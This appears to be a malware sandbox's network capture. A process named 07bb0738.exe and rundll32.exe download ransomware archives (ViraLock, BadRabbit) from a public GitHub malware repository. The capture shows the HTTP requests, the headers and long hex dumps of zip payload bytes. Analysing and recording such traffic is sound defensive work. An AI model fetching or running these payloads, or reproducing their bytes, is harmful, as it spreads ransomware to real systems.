                                                                                                                                                    2022-09-29 12:59:00 UTC4118INData Raw: 46 cc 14 a8 15 51 98 f2 42 16 92 21 38 7b 8b a4 4f 20 5d ac 27 f7 81 c7 f9 77 ff 14 cd 86 ab 4c 26 53 25 4c 8b 59 4e 96 50 3e 87 3b 0a 94 62 83 ae 87 c1 f6 17 f2 7e 6a 7a eb 09 a2 fa 0c c4 32 a7 63 e4 ea 82 a7 e1 36 41 33 18 e8 a0 52 11 75 89 3d e4 31 c4 e9 78 b4 02 43 b3 a8 bc b8 2d 4f dc 1f 8d 45 0c 24 5c 9b 4d 9b 0e 5b c5 b0 40 30 46 61 ca 1e b1 0d 65 1b b6 03 05 7c 74 4a 39 bf 40 ae f8 f9 09 15 9e 00 b1 59 be ba 5f 3d c8 67 73 55 75 50 98 e4 67 4c e7 41 0c 4d 0a 02 9e aa ae 3b b1 9d bf 13 ad 7e 82 92 87 36 01 af f2 1c dc e8 cd 73 f9 69 61 6a 89 55 aa df 8f 5b 3b cc d9 2d 7b a7 21 bf 18 4d 6f 5f a9 62 13 33 2b 1f d4 a4 c8 09 84 1a e0 c0 75 5e 1f 05 9f 0c 37 4f 83 30 57 d4 5e cf af 8b 57 38 2f 2a e3 30 18 d1 01 28 27 e2 9b e8 1b e1 89 de d6 9e 75 07 3b
                                                                                                                                                    Data Ascii: FQB!8{O ]'wL&S%LYNP>;b~jz2c6A3Ru=1xC-OE$\M[@0Fae|tJ9@Y_=gsUuPgLAM;~6siajU[;-{!Mo_b3+u^7O0W^W8/*0('u;
                                                                                                                                                    2022-09-29 12:59:00 UTC4128INData Raw: 93 65 0c 03 51 0d 05 0c 0e 24 6a 99 3d 94 f6 48 bd 90 24 48 bd 63 57 a2 76 f6 fa e3 e5 73 04 10 4e 3a 5c d5 22 fe f7 6b 8d 41 ca 1f 7f 7f 68 ef 12 b9 9d dc f6 98 ea a6 e3 b1 d0 f5 8c af 02 12 f0 b2 2c b9 3e 73 ce c6 b7 8d 35 a2 73 06 3a 97 f2 8e fd 5f ca ae ac e3 6b e1 93 43 67 6e 59 db 32 cd df 9a 5d bf 0e dc 96 fe 51 98 b9 88 57 d5 b2 24 dd 17 23 9e 0d 07 73 9d 4c 0c 88 a5 a6 1a 0f c4 b5 97 1e 25 27 a0 df b9 70 28 36 f7 47 18 ac 0d c9 4e bb 51 26 f9 d4 97 26 3a 2a f2 df 22 ea b1 17 42 aa 2e 04 a3 8a fc 04 08 94 ff b2 09 e3 bb 00 fa 05 84 02 d3 1e bd 70 62 96 bf da 92 89 c4 70 13 ad 4a bb 65 63 8e 6a b8 1c c0 02 95 a7 a4 2d 59 14 5d e1 a9 ad 4c ec a1 fd 12 e0 94 82 c7 02 2e 70 45 1a ce 06 d9 0e 7f 41 b6 a3 62 33 53 68 5d 31 8c 3d 57 44 7e 5e 0a 27 72 de
                                                                                                                                                    Data Ascii: eQ$j=H$HcWvsN:\"kAh,>s5s:_kCgnY2]QW$#sL%'p(6GNQ&&:*"B.pbpJecj-Y]L.pEAb3Sh]1=WD~^'r
                                                                                                                                                    2022-09-29 12:59:00 UTC4144INData Raw: 2b e2 7e 4d 90 01 73 19 4c 55 bc de ca f7 64 51 6b e3 89 fd 0e af 21 c6 c8 69 b6 f6 22 7d 1f 15 38 06 b3 2d 36 08 71 24 5f 80 2e d0 97 cd 40 52 c7 98 7f 48 e7 b6 42 dc 22 2e f8 bf a2 ac fb 38 cf ba 9d 25 5c 8a 6a 52 25 6c 02 d1 fc 25 2b 76 d6 fa 12 90 53 99 10 09 53 4e 91 c1 bf 43 c4 1c 6f f9 26 09 e9 38 83 7f f8 f2 70 10 37 54 39 8e 1f 58 1d 58 4c 11 cb 92 3e b5 b7 0a e1 61 08 65 e4 0c 8f 29 18 79 54 1f 6f 83 46 25 d1 30 18 ee d4 82 f0 86 50 40 c0 6a a1 55 7a 4f 3b c6 fd 8b 23 03 7c 10 21 13 10 fa 3d 6d 94 6f 8d 8b 99 b3 19 3a dc 7c b1 44 22 17 57 f9 e9 1d 99 e6 6b c5 0b f4 1e 7e f3 41 88 82 83 e9 21 99 8b d3 e4 fb df af f7 a6 cf 50 21 b7 f2 c1 9c 1b a7 e5 bc ad 43 88 96 8b 20 62 dd b5 1f 8e 70 65 8c d5 e4 36 1d da 9b b7 4f 0f 37 bf 3f 7b 8a 9a 3f 96 09
                                                                                                                                                    Data Ascii: +~MsLUdQk!i"}8-6q$_.@RHB".8%\jR%l%+vSSNCo&8p7T9XXL>ae)yToF%0P@jUzO;#|!=mo:|D"Wk~A!P!C bpe6O7?{?
                                                                                                                                                    2022-09-29 12:59:00 UTC4160INData Raw: 3b a5 8d 5b 28 4d e4 0b 51 db 5b 76 85 92 ed 39 a7 33 87 80 7f 0d 6a ec 5e d5 f7 2a 1a 9a 5b 3b aa 7d c7 a9 75 ea 2a 01 fe 45 7c 1d 10 33 3b ac 33 2f 79 06 b9 5a 97 13 ab fb 54 26 60 19 e7 98 74 62 17 71 9e 6f c3 a4 e5 43 d4 d3 6c 68 8c c1 46 1c f0 d3 d5 0a 61 f3 00 a7 36 bf 44 30 d9 74 e0 18 9a 74 b1 b2 25 15 67 91 b5 97 ef 8f ed 9b 3c c5 1f 95 1c 57 dd ff cb 0c ae 00 29 28 42 72 7f 72 10 98 3c a1 d9 a3 06 61 8e a0 8a 7d fe 52 04 a5 b5 52 9c 29 52 aa 60 90 64 c4 68 58 57 c4 85 17 d4 96 fe 1b b4 58 f1 75 be 0a d2 13 59 e1 03 6b ae a1 cd 8a be a0 52 1b b6 35 ac 7c 3f 38 60 bf 2d 37 98 ae a5 c4 1c 54 70 cd fc b2 81 fd 90 cb 80 5a 2a 58 f8 c6 63 3c 4a 9b 05 35 ca 0d 88 c6 ec 0d 70 9f 7d 46 1f b8 12 a4 2f 2e c7 ac b9 08 1a e7 de 28 e1 b3 d9 bd 6f 07 fd 3a 8b
                                                                                                                                                    Data Ascii: ;[(MQ[v93j^*[;}u*E|3;3/yZT&`tbqoClhFa6D0tt%g<W)(Brr<a}RR)R`dhXWXuYkR5|?8`-7TpZ*Xc<J5p}F/.(o:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    49192.168.2.349732140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:01 UTC4174OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    5192.168.2.349710140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:47 UTC189OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                    Host: github.com
                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    50140.82.121.3443192.168.2.349732C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:01 UTC4174INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:07 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:01 UTC4174INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    51192.168.2.349733185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:01 UTC4176OUTGET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    52185.199.108.133443192.168.2.349733C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:01 UTC4176INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 135339
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "2bb1943793128dcdbc238f30e0779c2b1525b546f66d38117659df251eb89cab"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0866:0543:E4C3D7:F301C9:6335934A
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:01 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6949-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456342.532583,VS0,VE233
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 1d13bce36dc1326ffae1778746c1930116746e9f
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:01 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:01 UTC4177INData Raw: 50 4b 03 04 33 00 01 00 63 00 0f 37 79 45 00 00 00 00 e1 0f 02 00 00 0a 03 00 17 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 56 69 72 61 4c 6f 63 6b 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 ed 91 64 e0 a1 85 e8 a0 cb 45 4a 4b c9 6b 96 10 99 81 2b 1d 24 3f e8 58 3b ea ca db e6 a4 67 1e 00 e6 fb 80 0f 17 9c a3 3e dc 6a 4f b1 b5 79 ab 70 3a f8 64 1e 80 04 fd 7e c9 a6 7f a7 8a ef 2e 9b 59 cf 79 88 93 ad eb 12 51 f7 b1 0b a9 8e 69 79 e7 f5 b5 5c 8d f8 f4 8e 7d ed ba 1d bb 09 e9 56 19 73 4c 01 8e 40 74 d0 0f f6 3c fe 84 b8 c1 61 75 90 6c 3d 69 a8 71 d5 f5 77 9d c7 2a dd 12 60 a5 7f 68 fe 61 bd b2 eb dd 1d c8 ea 09 9f 33 5c c7 30 80 6f 78 93 69 b5 0f e7 43 98 b4 66 ee 98 8f 3d 7f 45 8d ff f2 1f e4 3e f7 f0 41 99 10 92 0f 32 d0 58 da 23 e0 71 6d 6c 3e dc 81 d2
                                                                                                                                                    Data Ascii: PK3c7yEEndermanch@ViraLock.exeAEdEJKk+$?X;g>jOyp:d~.YyQiy\}VsL@t<aul=iqw*`ha3\0oxiCf=E>A2X#qml>
                                                                                                                                                    2022-09-29 12:59:01 UTC4178INData Raw: 56 99 97 ec dd bd c9 a3 1c 46 69 0b 2b 24 34 4e 0b 95 8d 76 2d 58 38 52 4f 20 39 99 6d 2a fe d0 2e b8 42 ae f9 10 88 74 73 e5 7e c0 cc 2b a4 98 19 69 f7 64 22 43 e6 74 04 9d 46 ee 4a 82 66 48 db 27 b3 d0 4e 61 71 84 d2 65 98 de f7 5d 9d d9 8c ba 63 f1 e8 c7 4f 45 f6 c1 a4 7d 68 bb 12 3d 5f 27 98 42 fa b8 56 e6 21 f2 41 3d ad 36 6b 59 db b9 60 ff 46 c9 41 42 bf df 11 72 49 30 c1 60 14 20 e8 d5 84 09 05 16 4f ec 06 24 80 86 3b 09 e5 7e 5a 08 0e 5b 76 48 8a 81 ba d0 f0 1c 0f d6 41 87 a9 d9 72 5d ad 99 8b cb 5f e0 05 9d 9c a2 54 df 32 a0 18 45 61 40 e4 c2 a5 1d 6e 77 72 79 19 39 e0 d8 99 17 54 8f 59 02 5b 4f 4e 23 68 38 6c 26 bd e8 97 be 3b a6 67 d5 5b 6a d7 81 45 31 54 6e 37 ea 4e f3 94 f9 36 f7 d5 a1 a7 f6 2f e6 77 08 ff 66 3d 3f b3 f9 8f d6 8d 7f bc ce cf
                                                                                                                                                    Data Ascii: VFi+$4Nv-X8RO 9m*.Bts~+id"CtFJfH'Naqe]cOE}h=_'BV!A=6kY`FABrI0` O$;~Z[vHAr]_T2Ea@nwry9TY[ON#h8l&;g[jE1Tn7N6/wf=?
                                                                                                                                                    2022-09-29 12:59:01 UTC4180INData Raw: f5 73 f7 5c 0a cf 7b f3 16 2b 3a ca 21 e5 d8 44 4d 88 72 d9 39 ef 8c 05 81 05 d0 b8 b8 70 fc 06 3f a1 66 dd 29 a5 e0 e5 ba d0 89 55 f1 a0 52 87 db 6d ef 02 c1 ab ae 21 fd e6 b6 3e b5 44 30 3b 1a 8e c7 11 7d b8 81 c2 99 2f 5a 35 40 27 51 3b da e6 23 68 49 2d fd 4d 8e 28 66 31 51 f2 31 71 84 89 1c 12 69 99 41 c2 54 69 52 75 ad e1 f2 4d d7 22 25 7a f5 2d 4b e3 35 d0 89 fe 11 eb 7a b3 3e 0f f5 08 85 55 ed e0 ec 23 ab e3 d5 25 ce 18 e6 f3 ae fb 59 25 c3 4d 50 61 b8 7a 3b 59 58 f6 26 6b f0 2c bf c1 cb 44 25 93 e1 87 7e 17 ad 8f 2c fd 51 14 22 7f dd 65 5c 48 cc 50 73 0e da 12 ca 38 78 0e bb de 2a 2f 3b b1 1f ba 3f 2a f8 a7 5d 74 7e e0 f1 43 a4 f8 81 67 92 4a d6 f4 53 67 b8 07 ba e6 10 ef 45 cc 7a db f2 72 ed fb b7 f9 fd 0c 25 9d 33 94 81 7b 81 d5 39 9d f9 06 78
                                                                                                                                                    Data Ascii: s\{+:!DMr9p?f)URm!>D0;}/Z5@'Q;#hI-M(f1Q1qiATiRuM"%z-K5z>U#%Y%MPaz;YX&k,D%~,Q"e\HPs8x*/;?*]t~CgJSgEzr%3{9x
                                                                                                                                                    2022-09-29 12:59:01 UTC4181INData Raw: a9 4a 12 99 f3 8a cb b7 28 6e 50 53 e4 11 5f 97 cc da b7 72 1a d5 8a 6a 7a 06 ac 26 7c 38 6e da 6b 81 ee a4 5d 7d b9 8f 22 0e 32 0e 0c 36 7a 72 bc a6 8a 22 4e de 4f 02 d4 31 61 57 64 4c 4e a3 8b 1e 1e 5e ae 58 9a 5f 6e 7f 57 77 5b 77 5a 83 9f ba ed 15 c0 45 23 4b 32 9e 7f 5d 61 b7 ac 02 5c d2 a2 8d 38 6e 67 f8 81 6d cc b9 d7 a3 08 a2 28 7f b9 32 c7 4d 90 00 b5 46 1e 92 10 74 ee ea f7 d2 e0 b4 96 50 e2 f9 a5 8a c2 83 6c b9 d9 82 06 97 b5 2d 74 1a 5d 38 f4 f8 40 d5 77 4c 2b 6c be 2a e9 58 a0 a5 a8 73 10 09 52 e2 8f e6 e9 d1 d0 eb 37 59 66 56 73 57 c4 08 64 c7 0b c7 2a 4f 3b 38 2f 56 2d ab fc 23 6c 69 38 83 7b 66 d1 9b a9 61 79 65 1b 8d 80 0f 48 27 0d 20 55 da c1 84 9f 41 1a 06 17 13 10 47 ce 44 30 5a 89 be 1c 70 d9 52 44 62 6d ae a7 f9 88 c8 a5 84 e8 d1 0b
                                                                                                                                                    Data Ascii: J(nPS_rjz&|8nk]}"26zr"NO1aWdLN^X_nWw[wZE#K2]a\8ngm(2MFtPl-t]8@wL+l*XsR7YfVsWd*O;8/V-#li8{fayeH' UAGD0ZpRDbm
                                                                                                                                                    2022-09-29 12:59:01 UTC4182INData Raw: 4f d7 0a 1b 04 ac 66 0d c3 85 da 2a eb 77 91 f3 ed f7 69 36 47 c1 be 9d d1 94 34 8c a3 a1 8b f5 c8 14 aa 5d c7 5b 5e f8 2f 16 1b ea 66 fa d6 17 5d d3 f4 29 09 b2 17 58 de 34 ab 64 49 6a d4 7f 36 a9 8e bf 21 1d 6e 32 a6 72 9a ae ee 95 5e 4a 7e fa 43 43 fa ca ab 2f 18 03 83 db bc ac 67 3e e6 b6 67 4d 20 d9 d9 3d e2 48 c3 e6 dc 59 6e f0 53 93 43 d0 f4 fe 25 04 76 55 69 88 11 ea 1d 1a a6 b5 50 32 bc 7f 26 58 29 66 ae b6 23 b9 f9 d4 20 6c 4f ed 06 0c 55 70 4b d1 a4 93 06 52 d3 25 c2 8b df 82 03 62 c7 a7 48 3d 65 cd 19 49 0d d7 4f cc f8 6e 9f 4e 22 a1 d6 a7 fd ff 63 f6 05 72 9d f5 20 55 ae a9 57 c1 f8 b8 5c 39 25 2a da 4e b5 c0 93 b6 cd f4 6b 7f 73 cd 39 00 dd c3 4f 24 6a 8d 82 f9 e1 e1 46 52 59 9f 3d d1 a1 47 ee f6 13 d8 bf 99 7b 62 f0 c2 ee a3 c3 88 a5 96 15
                                                                                                                                                    Data Ascii: Of*wi6G4][^/f])X4dIj6!n2r^J~CC/g>gM =HYnSC%vUiP2&X)f# lOUpKR%bH=eIOnN"cr UW\9%*Nks9O$jFRY=G{b
                                                                                                                                                    2022-09-29 12:59:01 UTC4184INData Raw: b1 b7 0d a1 61 43 b3 3c 2e a4 3c 30 97 9d a3 a2 7d 91 39 d1 27 75 43 96 47 5c 9b 94 47 c7 cf b2 f5 86 e8 63 e2 4c 1d af 4a 88 a5 23 82 12 c1 05 f4 d6 5b 51 88 c1 ea 55 13 f3 1d 18 bd 6e 2d ce dc 2a 98 03 0d cf 06 f9 de 9c 5d 8b 7d fe 23 20 86 a6 e5 ff 27 a7 76 75 90 10 c3 86 a8 23 20 9f d2 90 de 20 2a d5 6e e4 a0 79 cf 44 db 71 23 7c b7 98 3f 26 a1 92 41 42 6c cb 1b ed b5 ec 4b 28 14 62 35 97 c8 00 96 e3 2b 62 a9 a0 88 f3 b7 a3 f5 5c e4 f3 8f 6a 5e 8e 33 32 64 47 a2 e7 6f b8 ae 65 16 29 f2 df 79 ce d3 fe 0a 86 67 5d 04 de 70 c4 64 ec 40 bb c6 c1 1d 0e 01 d9 50 d1 4c d5 c3 20 19 63 45 31 06 96 5a 71 58 82 a4 81 ce 3a 6d e2 1b 10 eb 96 f0 78 65 df 8e fc 19 28 15 07 13 cb 38 67 7e 53 19 6e 63 9b cd ce ea de 0e 8b a2 46 55 10 38 77 ec 9c 29 c1 26 37 c9 7f 1e
                                                                                                                                                    Data Ascii: aC<.<0}9'uCG\GcLJ#[QUn-*]}# 'vu# *nyDq#|?&ABlK(b5+b\j^32dGoe)yg]pd@PL cE1ZqX:mxe(8g~SncFU8w)&7
                                                                                                                                                    2022-09-29 12:59:01 UTC4185INData Raw: 27 24 03 14 58 3a d2 bd c3 99 3f ae 30 8f 8c e2 54 75 ff 76 74 c6 fa 9c 05 49 bc fe b4 15 13 25 3a 5d 8c 4a e2 77 2f a1 e0 72 76 77 58 df 21 9a a7 99 1d f4 b8 be 3c 43 1d d0 2f cc fd 3e 34 d3 fc 2f 05 b2 e6 5e 3d 6e 18 7d 4d 8e 98 19 aa b3 42 80 b8 22 2c cb d7 82 a2 3d 41 e0 96 19 fa 90 8e 91 56 bb 3c b4 24 65 87 2e a7 3d 6e 25 9d 57 e7 4b 7e 68 be 8a 3c a0 4b 61 62 2a ea 10 d5 e2 03 60 d5 9a c3 36 fd 74 05 6c bd 23 a8 39 2c 78 5b 01 c2 74 db 03 78 26 34 1d b8 ad 34 7d 1c 92 10 8c 1b 96 f5 04 4c f5 4f 51 c8 19 78 47 8c 29 ff 88 cb ee 67 87 fd 4c a8 58 f5 5c 7d 14 24 cc 8a 79 ee a7 aa a0 31 a0 56 a3 c1 5c 26 64 7a 82 86 d8 dd 24 66 55 8f 4d dd ac fb 12 67 9f ca ac f5 52 7d 40 c7 a7 ab d5 26 98 77 e6 c4 ef 5d b7 36 83 8e 4c 1c 6e 4f b3 80 e8 9e 26 74 8a 2a
                                                                                                                                                    Data Ascii: '$X:?0TuvtI%:]Jw/rvwX!<C/>4/^=n}MB",=AV<$e.=n%WK~h<Kab*`6tl#9,x[tx&44}LOQxG)gLX\}$y1V\&dz$fUMgR}@&w]6LnO&t*
                                                                                                                                                    2022-09-29 12:59:01 UTC4186INData Raw: 08 4d 6b b0 06 1c 14 79 60 fe cc 58 9a 14 9c 55 df fa fb 33 18 96 e2 0d 76 d1 bd f5 01 9a 6f 0f a0 18 c8 f9 48 63 c1 ad 20 5f 3e 10 b9 34 cb d6 b4 55 64 e0 c2 4d 58 83 81 6b b5 7d d7 26 b7 1a a8 4d 79 49 3f c1 8a 59 a4 7d 61 9d 13 53 46 dc 7e 82 bb cc 25 9f 82 a0 3c ba 71 e2 ad 43 30 cf f3 7c d0 8f 38 ae b3 e6 24 47 6d e6 99 92 33 68 a3 9c db 6a f3 24 96 f7 76 5a 48 7e 06 be 7f dd 93 e1 98 78 c4 bf 03 0b 99 bf 8b 3b dd 7e 5a 98 58 ef 28 a2 5c e3 87 1d ea 2e fe 9d 64 b3 54 30 83 b4 40 24 7b 15 75 c3 52 f5 e0 fc b2 19 6f e2 46 60 e8 73 04 01 03 f9 6f 4d 47 3d d1 42 18 62 94 e5 5a ec 2f db d2 68 4f f6 17 3e b2 cf 69 64 9e f2 ec 43 85 12 e2 8c d6 fb 32 71 42 4b 1f 6e 49 bb 30 8f 7a 9c 63 b7 3d 1f 23 32 a0 e2 b3 a4 71 1d 9b 75 b0 b8 ca 68 25 7c d5 30 27 40 ad
                                                                                                                                                    Data Ascii: Mky`XU3voHc _>4UdMXk}&MyI?Y}aSF~%<qC0|8$Gm3hj$vZH~x;~ZX(\.dT0@${uRoF`soMG=BbZ/hO>idC2qBKnI0zc=#2quh%|0'@
                                                                                                                                                    2022-09-29 12:59:01 UTC4188INData Raw: a0 65 ae 1f 8e da 70 24 61 b8 7f d4 a7 65 2b e8 00 76 75 02 3e c7 24 b1 3e 2e 86 13 c6 27 4e ca 57 bc 6b c9 6f e7 6f 0b 5d e9 b5 06 c2 4d 31 6a a1 85 4b 31 7f 00 27 ec 30 69 16 92 3b dd 26 b0 d2 9a 37 11 85 82 2c 4c 3d 52 00 00 24 48 a8 df f6 39 47 5c 7c f6 14 ea da c1 45 fa 09 57 53 0d 93 20 81 63 92 68 5d 78 6d 08 81 00 ef 87 3a bf eb a6 94 20 d2 04 8c 12 a2 8f ee a7 0c 80 1c 38 33 97 c5 c2 37 d3 88 34 1c 43 81 56 76 97 6e 46 e7 02 03 18 1b 5b 02 ec 75 92 82 8c ba 5e 91 a7 b7 4b 2e ae 84 9b b2 c5 7e b0 cd 1f e1 a1 98 69 1c 47 b9 70 4e ef a8 5b 84 fb fc 30 17 3d 95 5e 72 4c 59 32 1f 26 50 41 4f 62 8a ab db 28 94 72 28 87 9d 6d 73 b9 5c a7 fc d8 ba a8 33 bb 53 18 3d 5d 80 91 7e 91 3a 62 a5 ca d0 89 92 7e fa 7d e7 be e0 43 8e 1c 41 a3 f9 4f 80 6c cd 9b da
                                                                                                                                                    Data Ascii: ep$ae+vu>$>.'NWkoo]M1jK1'0i;&7,L=R$H9G\|EWS ch]xm: 8374CVvnF[u^K.~iGpN[0=^rLY2&PAOb(r(ms\3S=]~:b~}CAOl
                                                                                                                                                    2022-09-29 12:59:01 UTC4189INData Raw: e2 2b 94 38 7c 73 9d 10 17 69 09 fc c0 91 07 1b 70 8e f9 3a 5e 3c 29 20 37 0c e5 26 70 31 9a 4f 96 b0 33 e9 8b cf b2 4d b9 23 2b 77 ed 3f b9 14 7d 27 4c 53 61 95 68 96 30 23 b7 18 ef 90 55 7e fc 57 d2 7e 60 60 25 3c 2a 08 c5 8e 3f 7e 11 2b 43 77 28 78 b2 c6 b7 19 99 c0 59 4e de ce 8d 82 2b 3f 92 ec c8 f8 f5 96 af f8 f9 00 5c 6d b5 96 2e ce 26 29 24 e9 c1 6b 69 d1 5a 41 70 21 cb f5 44 46 a3 ac 81 30 26 8e a8 75 cb 02 c6 f8 51 0e 7b 17 39 55 d8 4b ed 1c 26 ec 2f be 87 4b 55 89 27 a6 9f 5e 1c 10 52 b0 77 d9 6b 80 96 29 13 00 79 48 57 4e 6b 13 63 43 a4 2e c2 31 c7 23 09 cd 05 cb 55 31 c7 a2 c7 8e b9 ba 1d 86 a2 5d 43 4e a7 d8 e0 d6 d1 2a 36 73 cc 42 aa e6 e7 78 55 bc bf ca 0b 76 a9 e8 89 1b 83 9f de 36 10 2b 57 55 08 46 87 d4 b3 a9 7f a9 67 68 a1 4f 33 a7 ed
                                                                                                                                                    Data Ascii: +8|sip:^<) 7&p1O3M#+w?}'LSah0#U~W~``%<*?~+Cw(xYN+?\m.&)$kiZAp!DF0&uQ{9UK&/KU'^Rwk)yHWNkcC.1#U1]CN*6sBxUv6+WUFghO3
                                                                                                                                                    2022-09-29 12:59:01 UTC4190INData Raw: 5a 58 c2 37 e0 5d 4c 0f 17 ae 63 58 14 e2 5a 5f 1d 65 a3 0a 0c 42 a1 c8 49 6f 11 b5 3f 7e 04 01 a8 50 18 7c 2a 3f 6c 7f 10 2d 90 3b bc 63 7a 87 16 e9 da 0b ce a5 2c bf 7a 90 b3 76 08 ca cf fe f3 e6 f6 4a 05 3d 97 21 cc 9a e2 da e6 81 c4 2c cb 86 ec 37 46 6a 0c 10 4a 0f 02 3d ba 80 d3 3e d0 a6 34 71 bd 6a a6 ae f5 13 b3 19 9f 00 3b bc fc ed 1f c7 75 99 25 41 5c 3a d4 98 88 dc df 1f ca d0 60 13 88 f2 bb 98 f8 5e 05 d2 4a d5 49 57 d7 c0 3e cc 72 9f 38 37 3a ce d3 ce 71 91 35 3b 59 dd 07 41 20 c7 dd 69 ef 95 eb e9 48 b5 33 46 49 d7 e8 9a b0 ed f2 b7 7e b8 b6 8d b2 38 ca fd 04 a3 88 38 e4 b2 11 aa 95 a9 e3 ca 38 5d 35 41 fd e8 a0 18 e3 41 7a 0f f8 b1 e1 44 b9 3a 42 96 26 49 6c e6 c8 4b fd 5c 1a 2a ec 9a d3 04 cb fd 44 42 51 75 42 d1 07 26 d0 ce c7 3e 03 cd f7
                                                                                                                                                    Data Ascii: ZX7]LcXZ_eBIo?~P|*?l-;cz,zvJ=!,7FjJ=>4qj;u%A\:`^JIW>r87:q5;YA iH3FI~888]5AAzD:B&IlK\*DBQuB&>
